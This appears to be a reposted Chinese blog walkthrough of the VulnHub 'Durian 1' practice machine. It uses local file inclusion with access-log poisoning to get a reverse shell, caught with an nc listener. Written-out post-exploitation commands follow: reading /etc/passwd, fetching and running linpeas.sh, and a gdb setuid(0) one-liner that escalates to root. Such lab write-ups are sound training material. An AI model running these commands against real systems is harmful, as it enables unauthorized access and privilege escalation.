一、准备工作
下载地址:http://www.vulnhub.com/entry/durian-1,553/
更改网络模式
![](https://img-blog.csdnimg.cn/9b0661e1ae3a4a959d233bee66bee52d.png)
二、练习过程
1、是kali对当当前网段进行探测,发现192.168.174.138网址
netdiscover -r 192.168.174.0/24
![](https://img-blog.csdnimg.cn/00716b8d22844687a425dcf617854f68.png)
2、用浏览器访问192.168.174.138(80端口)、192.168.174.138:8088、192.168.174.138:8000、192.168.174.138:7080(7080是后台页面,其他为前台)地址,访问成功
![](https://img-blog.csdnimg.cn/e8eb4247db284eb0b91cecc876db65ed.png)
![](https://img-blog.csdnimg.cn/97e8bbbd08b24115b8a2fbe0ad7289c6.png)
![](https://img-blog.csdnimg.cn/92437be452614ed3a57b67e81928bbd3.png)
![](https://img-blog.csdnimg.cn/eb200ef7d8ef4e87b7efeeb7d11e1893.png)
2、进入192.168.174.138/cgi-data
![](https://img-blog.csdnimg.cn/0a451e5167e547c2b711566f26d9d940.png)
进入getimage.php文件
![](https://img-blog.csdnimg.cn/84099b0e3d804ba385061dcbb542cd34.png)
查看源代码
![](https://img-blog.csdnimg.cn/1f1239c0e2fa401d9e217b211621fea7.png)
3、在 http://192.168.174.138/cgi-data/getImage.php 尝试使用文件包含语句,发现能够正常的包含这个文件
![](https://img-blog.csdnimg.cn/f944e2dc8c8b44a79452f6f4ddfd4f93.png)
4、尝试包含/var/log/durian.log/access.log,包含成功!
![](https://img-blog.csdnimg.cn/cec6557ef7db4878a09e5f54a1fb4c9d.png)
5、使用burpsuit对包含/var/log/durian.log/access.log的网页进行抓包并反弹shell
![](https://img-blog.csdnimg.cn/165ad5aff1c84730b3619fbfa628fa5d.png)
![](https://img-blog.csdnimg.cn/4bc41f0ff70441bbb0f24de45ac3f680.png)
![](https://img-blog.csdnimg.cn/c28e6fa4a17a4d8cb2e65ddc04838adb.png)
![](https://img-blog.csdnimg.cn/dbb2711bb4044bc39281e9947e9a2b34.png)
![](https://img-blog.csdnimg.cn/6d7c7737bcfa4f9687c36bbed9b41905.png)
kali对8888进行监听
nc -lvvp 8888
![](https://img-blog.csdnimg.cn/9f3b4c29dd6845c085a499f226e5f2f3.png)
发送数据包
![](https://img-blog.csdnimg.cn/148cc232722b43cfacb08d5a843783c2.png)
反弹成功
![](https://img-blog.csdnimg.cn/796e25af013e4d89a0a954100e36bf4c.png)
但是使用nc -lvvp 8888无法进行退格因此我们使用rlwrap nc -lvvp 8888指令进行监听然后再次发送包
![](https://img-blog.csdnimg.cn/e52dee75aeec4dacb75070b0dc49da15.png)
6、查看当前id
![](https://img-blog.csdnimg.cn/eab0968fd2ca4f0e959ec0abebc02935.png)
7、开启交互式
![](https://img-blog.csdnimg.cn/4d9a3bf73ea8407d9997f7a03a9c9070.png)
python3 -c 'import pty;pty.spawn("/bin/bash")'
![](https://img-blog.csdnimg.cn/c5fb4106441f4308832de7d287ba2502.png)
8、进入/home目录下查看用户目录
cd /home ls
`
9、进入durian文件,查看目录下的信息
cd durian ls -al
![](https://img-blog.csdnimg.cn/f717f4c68fe5474380aae96c565feb85.png)
10、查看/etc/passwd的内容,发现durian相关信息
cat /etc/passwd
![](https://img-blog.csdnimg.cn/80673461a8b94c8781429adfe0c42501.png)
11、使用sudo查看信息进行提权
sudo -l
![](https://img-blog.csdnimg.cn/3208132791a848069b5b5cf1ce9c7b2a.png)
12、查看/sbin/shutdown目录下的信息,发现这是个链接,这是一个可写的文件
ls -al /sbin/shutdown
![](https://img-blog.csdnimg.cn/5797e42976914cde8675447fb2d3d9f2.png)
13、查看ls -al /bin/systemctl文件,发现这是一个可执行文件
ls -al /bin/systemctl
![](https://img-blog.csdnimg.cn/27bb5c739dfc40a49fde54bddf8d05b5.png)
14、查看/bin/ping目录下的信息
ls -al /bin/ping
![](https://img-blog.csdnimg.cn/84a9e36695d3479a8ccc7d691cdeb46b.png)
15、先进入/tmp目录下下载linpeas.sh(提权自动化的脚本)工具
cd /tmp wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
![](https://img-blog.csdnimg.cn/5db8f2c172a64d088952a7d714357101.png)
16、查看当前所有有文件,发现linpeas.sh是没有执行权限的
ls -al
![](https://img-blog.csdnimg.cn/b933ef6be7214be2a3ad78c9369b4909.png)
17、给linpeas.sh加执行权限,再次查看
chmod +x linpeas.sh ls -al
![](https://img-blog.csdnimg.cn/f779b575c8a44c378dc1624542bbfd71.png)
18、执行linpeas.sh并将结果输出给123.txt
./linpeas.sh > 123.txt
19、开启9999端口
python3 -m http.server 9999
![](https://img-blog.csdnimg.cn/11056223657640e59b57425a2ad17447.png)
20、新建一个kali的对话框
![](https://img-blog.csdnimg.cn/dffb8f56ab144ea8bd7c312c199d489f.png)
进入/tmp目录下
cd /tmp
下载文件123.txt
wget http://192.168.174.138:9999/123.txt
![](https://img-blog.csdnimg.cn/1c7a711be8914db19fb76e9574652382.png)
查看123.txt
cat 123.txt |more
![](https://img-blog.csdnimg.cn/5c92b1002d87490390781b9387c992a6.png)
21、gdb是一个调试工具,具有高权限,回到上线的命令窗口查看是否有gdb,
ls -al /bin/gdb
![](https://img-blog.csdnimg.cn/f610b01e3cd0483fa0110ed2784e295a.png)
22、执行以下命令进行提权,然后查看当前权限
/usr/bin/gdb -nx -ex 'python import os; os.setuid(0)' -ex '!sh' -ex quit id
![](https://img-blog.csdnimg.cn/eb3248e7a1ce4319b61d0c0d031492ac.png)
23、添加交互式得到root权限
python3 -c 'import pty;pty.spawn("/bin/bash")'
![](https://img-blog.csdnimg.cn/55a81323c6b74784bcd2ccd669b8d7e8.png)
![](https://img-blog.csdnimg.cn/3c69a407945f4054b073deb63b1e98bf.png)
标签:
web安全
本文转载自: https://blog.csdn.net/qq_62716256/article/details/126859300
版权归原作者 菜鸟也疯狂!! 所有, 如有侵权,请联系我们删除。
版权归原作者 菜鸟也疯狂!! 所有, 如有侵权,请联系我们删除。